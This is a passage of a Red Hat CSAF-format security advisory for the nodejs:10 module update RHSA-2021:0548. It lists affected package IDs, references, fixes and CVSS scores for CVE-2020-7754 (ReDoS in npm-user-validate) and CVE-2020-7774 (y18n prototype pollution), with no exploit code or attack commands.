"AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7754" }, { "category": "external", "summary": "RHBZ#1892430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1892430" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7754", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7754" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7754", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7754" }, { "category": "external", "summary": "https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p", "url": "https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p" } ], "release_date": "2020-10-16T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:46+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0548" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.0" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS" }, { "cve": "CVE-2020-7774", "cwe": { "id": "CWE-915", "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes" }, "discovery_date": "2020-11-17T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1898680" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-y18n. There is a prototype pollution vulnerability in y18n\u0027s locale functionality. If an attacker is able to provide untrusted input via locale, they may be able to cause denial of service or in rare circumstances, impact to data integrity or confidentiality.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-y18n: prototype pollution vulnerability", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), OpenShift ServiceMesh (OSSM) and OpenShift distributed tracing the affected components are behind OpenShift OAuth authentication. This restricts access to the vulnerable nodejs-y18n library to authenticated users only, therefore the impact is Low.\n\nIn Red Hat OpenShift Container Storage 4 the noobaa-core container includes the affected version of y18n as a dependency of yargs. However, no unsafe usage found where the module accepts untrusted input and hence this issue has been rated as having a security impact of Low.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7774" }, { "category": "external", "summary": "RHBZ#1898680", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898680" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7774", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7774" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7774", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7774" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-Y18N-1021887", "url": "https://snyk.io/vuln/SNYK-JS-Y18N-1021887" } ], "release_date": "2020-10-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:46+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0548" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", 